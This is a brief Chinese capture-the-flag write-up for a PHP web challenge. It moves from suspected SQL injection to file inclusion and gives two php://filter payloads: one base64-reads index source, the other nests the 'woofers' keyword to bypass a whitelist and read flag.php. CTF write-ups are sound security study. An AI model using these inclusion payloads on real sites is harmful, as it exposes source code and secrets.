随便点一个试试
观察url,猜测sql注入
测试
弹出include报错,那就是文件包含了
直接读index的源码
payload
?category=php://filter/read=convert.base64-encode/resource=index
观察代码,传入的参数要含有woofers或meowers或index才可以调用include()
打ctf打多了,可以确定flag就在flag.php里头了
虽然上面必须包含woofers或meowers或index
但是php伪协议可以套一层协议,从而绕过,进行任意文件读取,直接读flag.php
payload
?category=php://filter/read=convert.base64-encode/woofers/resource=flag